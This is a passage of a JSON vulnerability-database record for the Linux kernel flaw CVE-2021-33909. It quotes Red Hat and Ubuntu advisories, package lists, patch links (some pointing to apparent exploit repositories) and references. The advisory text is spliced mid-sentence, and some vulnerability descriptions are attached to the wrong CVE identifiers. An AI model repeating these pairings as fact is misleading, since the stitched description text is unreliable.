Enterprise Linux 7.6 Update Services for SAP\nSolutions. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Server AUS (v. 7.6) - noarch, x86_64\nRed Hat Enterprise Linux Server E4S (v. 7.6) - noarch, ppc64le, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 7.6) - x86_64\nRed Hat Enterprise Linux Server Optional E4S (v. 7.6) - ppc64le, x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 7.6) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 7.6) - noarch, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nSecurity Fix(es):\n\n* kernel: size_t-to-int conversion vulnerability in the filesystem layer\n(CVE-2021-33909)\n\n* kernel: Use after free via PI futex state (CVE-2021-3347)\n\n* kernel: use-after-free in net/bluetooth/hci_event.c when destroying an\nhci_chan (CVE-2021-33034)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* [CKI kernel builds]: x86 binaries in non-x86 kernel rpms breaks systemtap\n[7.9.z] (BZ#1975159)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1922249 - CVE-2021-3347 kernel: Use after free via PI futex state\n1961305 - CVE-2021-33034 kernel: use-after-free in net/bluetooth/hci_event.c when destroying an hci_chan\n1970273 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer\n\n6. Package List:\n\nRed Hat Enterprise Linux Server AUS (v. 7.6):\n\nSource:\nkernel-3.10.0-957.78.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-957.78.2.el7.noarch.rpm\nkernel-doc-3.10.0-957.78.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debug-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-devel-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-headers-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-tools-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-957.78.2.el7.x86_64.rpm\nperf-3.10.0-957.78.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\npython-perf-3.10.0-957.78.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server E4S (v. 7.6):\n\nSource:\nkernel-3.10.0-957.78.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-957.78.2.el7.noarch.rpm\nkernel-doc-3.10.0-957.78.2.el7.noarch.rpm\n\nppc64le:\nkernel-3.10.0-957.78.2.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-957.78.2.el7.ppc64le.rpm\nkernel-debug-3.10.0-957.78.2.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-957.78.2.el7.ppc64le.rpm\nkernel-devel-3.10.0-957.78.2.el7.ppc64le.rpm\nkernel-headers-3.10.0-957.78.2.el7.ppc64le.rpm\nkernel-tools-3.10.0-957.78.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-957.78.2.el7.ppc64le.rpm\nperf-3.10.0-957.78.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm\npython-perf-3.10.0-957.78.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm\n\nx86_64:\nkernel-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debug-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-devel-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-headers-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-tools-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-957.78.2.el7.x86_64.rpm\nperf-3.10.0-957.78.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\npython-perf-3.10.0-957.78.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 7.6):\n\nSource:\nkernel-3.10.0-957.78.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-957.78.2.el7.noarch.rpm\nkernel-doc-3.10.0-957.78.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debug-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-devel-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-headers-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-tools-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-957.78.2.el7.x86_64.rpm\nperf-3.10.0-957.78.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\npython-perf-3.10.0-957.78.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 7.6):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-957.78.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional E4S (v. 7.6):\n\nppc64le:\nkernel-debug-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-957.78.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-957.78.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-957.78.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-957.78.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 7.6):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-957.78.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-3347\nhttps://access.redhat.com/security/cve/CVE-2021-33034\nhttps://access.redhat.com/security/cve/CVE-2021-33909\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/RHSB-2021-006\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYPc/p9zjgjWX9erEAQiGYQ/6Apfv6Vn+s1cJsOrv5bpIB+TZWR8Dw4w6\n7q5tqmrA0W38qvq7EWqVwAZMtmF2YXIcuP8i8zELAPG/Y1oMax3Piy5nxc4OR55i\n8H9pc0lGZn9UJtryWMPaJRqvWGF1WhE/vGPUkHhI3CmoSVDN3B3OqfC04oeVa/Gt\nf9wikugrLvXoD+YsJk1LAn0tJ+xGrcbMRvwxvvtvwRsje2cGPU6OAEWQr1ZKyNZc\nFwi6jLUve8d3wxE6+C6IocTYMcZcw2e2U4KOwE/ONXjjNgbwV+deQU16HJk4BjcA\nrDqtVUWzNGXzONh6Ua4yEisVe8LdhPNoZaciNx56lKpOs8Vbv58w29edfR1zf0fW\nc1gH+0S19jDSwsESNSKJth5A/GY0zxsUeh5qDjoFUF1AH6IuZNmPb3VGcl5klKuo\noutLUo2jeIRiBiZaNSVe32nbWCEkAoFF5WrvfHYmi+i9U45gLvUG2N58ZtOQiQkb\npotW9xF7f15Mm1Xm9TOIaNy+ykh7TJRxKnQSaAk/jnzTLp3XeVNmPTztx7zA4Z50\nbgM/MQWB9j7NMjwEopdbS4lxJsvaXerwXPT+1WDAzBZ5clOKyB5hTxTTBOrsErzs\nO+wKRVu9eU4FMR6ULeL+pLCZPm0eVlu9jBuySEUI05/FkAVu/YUDrgXvMiy6XknI\nziN+XVubHjk=1ifB\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. 7) - ppc64le, x86_64\n\n3. Description:\n\nThis is a kernel live patch module which is automatically loaded by the RPM\npost-install script to modify the code of a running kernel. =========================================================================\nUbuntu Security Notice USN-5016-1\nJuly 20, 2021\n\nlinux, linux-aws, linux-aws-5.8, linux-azure, linux-azure-5.8, linux-gcp,\nlinux-gcp-5.8, linux-hwe-5.8, linux-kvm, linux-oracle, linux-oracle-5.8,\nlinux-raspi vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.10\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\nexecute arbitrary code. (CVE-2021-33909)\n\nOr Cohen and Nadav Markus discovered a use-after-free vulnerability in the\nnfc implementation in the Linux kernel. A privileged local attacker could\nuse this issue to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-23134)\n\nIt was discovered that a race condition in the kernel Bluetooth subsystem\ncould lead to use-after-free of slab objects. An attacker could use this\nissue to possibly execute arbitrary code. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-33034)\n\nIt was discovered that an out-of-bounds (OOB) memory access flaw existed in\nthe f2fs module of the Linux kernel. A local attacker could use this issue\nto cause a denial of service (system crash). (CVE-2021-3506)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.10:\n  linux-image-5.8.0-1032-raspi    5.8.0-1032.35\n  linux-image-5.8.0-1032-raspi-nolpae  5.8.0-1032.35\n  linux-image-5.8.0-1033-kvm      5.8.0-1033.36\n  linux-image-5.8.0-1037-oracle   5.8.0-1037.38\n  linux-image-5.8.0-1038-gcp      5.8.0-1038.40\n  linux-image-5.8.0-1039-azure    5.8.0-1039.42\n  linux-image-5.8.0-1041-aws      5.8.0-1041.43\n  linux-image-5.8.0-63-generic    5.8.0-63.71\n  linux-image-5.8.0-63-generic-64k  5.8.0-63.71\n  linux-image-5.8.0-63-generic-lpae  5.8.0-63.71\n  linux-image-5.8.0-63-lowlatency  5.8.0-63.71\n  linux-image-aws                 5.8.0.1041.43\n  linux-image-azure               5.8.0.1039.40\n  linux-image-gcp                 5.8.0.1038.38\n  linux-image-generic             5.8.0.63.69\n  linux-image-generic-64k         5.8.0.63.69\n  linux-image-generic-lpae        5.8.0.63.69\n  linux-image-gke                 5.8.0.1038.38\n  linux-image-kvm                 5.8.0.1033.36\n  linux-image-lowlatency          5.8.0.63.69\n  linux-image-oem-20.04           5.8.0.63.69\n  linux-image-oracle              5.8.0.1037.36\n  linux-image-raspi               5.8.0.1032.34\n  linux-image-raspi-nolpae        5.8.0.1032.34\n  linux-image-virtual             5.8.0.63.69\n\nUbuntu 20.04 LTS:\n  linux-image-5.8.0-1037-oracle   5.8.0-1037.38~20.04.1\n  linux-image-5.8.0-1038-gcp      5.8.0-1038.40~20.04.1\n  linux-image-5.8.0-1039-azure    5.8.0-1039.42~20.04.1\n  linux-image-5.8.0-1041-aws      5.8.0-1041.43~20.04.1\n  linux-image-5.8.0-63-generic    5.8.0-63.71~20.04.1\n  linux-image-5.8.0-63-generic-64k  5.8.0-63.71~20.04.1\n  linux-image-5.8.0-63-generic-lpae  5.8.0-63.71~20.04.1\n  linux-image-5.8.0-63-lowlatency  5.8.0-63.71~20.04.1\n  linux-image-aws                 5.8.0.1041.43~20.04.13\n  linux-image-azure               5.8.0.1039.42~20.04.11\n  linux-image-gcp                 5.8.0.1038.40~20.04.13\n  linux-image-generic-64k-hwe-20.04  5.8.0.63.71~20.04.45\n  linux-image-generic-hwe-20.04   5.8.0.63.71~20.04.45\n  linux-image-generic-lpae-hwe-20.04  5.8.0.63.71~20.04.45\n  linux-image-lowlatency-hwe-20.04  5.8.0.63.71~20.04.45\n  linux-image-oracle              5.8.0.1037.38~20.04.13\n  linux-image-virtual-hwe-20.04   5.8.0.63.71~20.04.45\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. An attacker in a guest VM could use\nthis to write to portions of the host\u2019s physical memory. (CVE-2021-3653)\n\nMaxim Levitsky and Paolo Bonzini discovered that the KVM hypervisor\nimplementation for AMD processors in the Linux kernel allowed a guest VM\nto disable restrictions on VMLOAD/VMSAVE in a nested guest. An attacker\nin a guest VM could use this to read or write portions of the host\u2019s\nphysical memory. (CVE-2021-22555)\n\nIt was discovered that the virtual file system implementation in the\nLinux kernel contained an unsigned to signed integer conversion error. If you are running a kernel version earlier than the one listed\nbelow, please upgrade your kernel as soon as possible",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "db": "PACKETSTORM",
        "id": "163578"
      },
      {
        "db": "PACKETSTORM",
        "id": "163579"
      },
      {
        "db": "PACKETSTORM",
        "id": "163583"
      },
      {
        "db": "PACKETSTORM",
        "id": "163594"
      },
      {
        "db": "PACKETSTORM",
        "id": "163597"
      },
      {
        "db": "PACKETSTORM",
        "id": "163602"
      },
      {
        "db": "PACKETSTORM",
        "id": "163603"
      },
      {
        "db": "PACKETSTORM",
        "id": "163607"
      },
      {
        "db": "PACKETSTORM",
        "id": "164155"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909",
        "trust": 2.0
      },
      {
        "db": "PACKETSTORM",
        "id": "164155",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/09/21/1",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/07/20/1",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/08/25/10",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/09/17/2",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/07/22/7",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/09/17/4",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "163621",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "163671",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "165477",
        "trust": 1.0
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33909",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163578",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163579",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163583",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163594",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163597",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163602",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163603",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163607",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "db": "PACKETSTORM",
        "id": "163578"
      },
      {
        "db": "PACKETSTORM",
        "id": "163579"
      },
      {
        "db": "PACKETSTORM",
        "id": "163583"
      },
      {
        "db": "PACKETSTORM",
        "id": "163594"
      },
      {
        "db": "PACKETSTORM",
        "id": "163597"
      },
      {
        "db": "PACKETSTORM",
        "id": "163602"
      },
      {
        "db": "PACKETSTORM",
        "id": "163603"
      },
      {
        "db": "PACKETSTORM",
        "id": "163607"
      },
      {
        "db": "PACKETSTORM",
        "id": "164155"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "id": "VAR-202107-1361",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.26739928
  },
  "last_update_date": "2026-03-09T20:45:16.848000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "Amazon Linux AMI: ALAS-2021-1524",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2021-1524"
      },
      {
        "title": "Debian Security Advisories: DSA-4941-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=fb9b5f5cc430f484f4420a11b7b87136"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-055",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2LIVEPATCH-2021-055"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.10-2022-003",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2KERNEL-5.10-2022-003"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2021-1691",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2021-1691"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-057",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2LIVEPATCH-2021-057"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-056",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2LIVEPATCH-2021-056"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202107-48] linux: privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-202107-48"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202107-50] linux-hardened: privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-202107-50"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.4-2022-005",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2KERNEL-5.4-2022-005"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-058",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2LIVEPATCH-2021-058"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-059",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2LIVEPATCH-2021-059"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202107-49] linux-zen: privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-202107-49"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202107-51] linux-lts: privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-202107-51"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-33909 log"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "LinuxVulnerabilities",
        "trust": 0.1,
        "url": "https://github.com/gitezri/LinuxVulnerabilities "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/Live-Hack-CVE/CVE-2021-33909 "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/AmIAHuman/CVE-2021-33909 "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/Liang2580/CVE-2021-33909 "
      },
      {
        "title": "cve-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/baerwolf/cve-2021-33909 "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/bbinfosec43/CVE-2021-33909 "
      },
      {
        "title": "deep-directory",
        "trust": 0.1,
        "url": "https://github.com/sfowl/deep-directory "
      },
      {
        "title": "integer_compilation_flags",
        "trust": 0.1,
        "url": "https://github.com/mdulin2/integer_compilation_flags "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/AlAIAL90/CVE-2021-33909 "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/ChrisTheCoolHut/CVE-2021-33909 "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/knewbury01/codeql-workshop-integer-conversion "
      },
      {
        "title": "kickstart-rhel8",
        "trust": 0.1,
        "url": "https://github.com/alexhaydock/kickstart-rhel8 "
      },
      {
        "title": "exploit_articles",
        "trust": 0.1,
        "url": "https://github.com/ChoKyuWon/exploit_articles "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/hardenedvault/ved "
      },
      {
        "title": "SVG-advisories",
        "trust": 0.1,
        "url": "https://github.com/EGI-Federation/SVG-advisories "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/makoto56/penetration-suite-toolkit "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-787",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-190",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/163621/sequoia-a-deep-root-in-linuxs-filesystem-layer.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/163671/kernel-live-patch-security-notice-lsn-0079-1.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/164155/kernel-live-patch-security-notice-lsn-0081-1.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/165477/kernel-live-patch-security-notice-lsn-0083-1.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/07/22/7"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/08/25/10"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/09/17/2"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/09/17/4"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/09/21/1"
      },
      {
        "trust": 1.0,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.13.4"
      },
      {
        "trust": 1.0,
        "url": "https://github.com/torvalds/linux/commit/8cae8cd89f05f6de223d63e6d15e31c8ba9cf53b"
      },
      {
        "trust": 1.0,
        "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00014.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00015.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00016.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/z4uhhigiso3fvrf4cqnjs4ika25atsfu/"
      },
      {
        "trust": 1.0,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2022-0015"
      },
      {
        "trust": 1.0,
        "url": "https://security.netapp.com/advisory/ntap-20210819-0004/"
      },
      {
        "trust": 1.0,
        "url": "https://www.debian.org/security/2021/dsa-4941"
      },
      {
        "trust": 1.0,
        "url": "https://www.openwall.com/lists/oss-security/2021/07/20/1"
      },
      {
        "trust": 1.0,
        "url": "https://www.oracle.com/security-alerts/cpujan2022.html"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33909"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-33909"
      },
      {
        "trust": 0.7,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-006"
      },
      {
        "trust": 0.7,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-33034"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-32399"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3347"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3347"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-32399"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2735"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12362"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12362"
      },
      {
